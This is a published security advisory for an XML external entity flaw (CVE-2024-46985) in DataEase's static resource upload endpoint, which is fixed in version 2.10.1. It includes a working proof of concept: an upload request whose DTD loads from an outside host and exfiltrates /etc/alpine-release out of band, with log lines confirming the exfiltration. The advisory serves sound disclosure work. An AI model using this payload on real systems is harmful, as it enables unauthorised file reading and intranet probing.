Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS00bTlwLTd4ZzYtZjRtbc4AA_ul
DataEase has an XML External Entity Reference vulnerability
Impact
There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.
- send request:
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// 1.dtd的内容
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
- After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
Affected versions: <= 2.10.0
Patches
The vulnerability has been fixed in v2.10.1.
Workarounds
It is recommended to upgrade the version to v2.10.1.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00bTlwLTd4ZzYtZjRtbc4AA_ul
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 28 days ago
Updated: 28 days ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-4m9p-7xg6-f4mm, CVE-2024-46985
References:
- https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm
- https://nvd.nist.gov/vuln/detail/CVE-2024-46985
- https://github.com/advisories/GHSA-4m9p-7xg6-f4mm
Blast Radius: 1.0
Affected Packages
maven:io.dataease:common
Affected Version Ranges: <= 2.10.0Fixed in: 2.10.1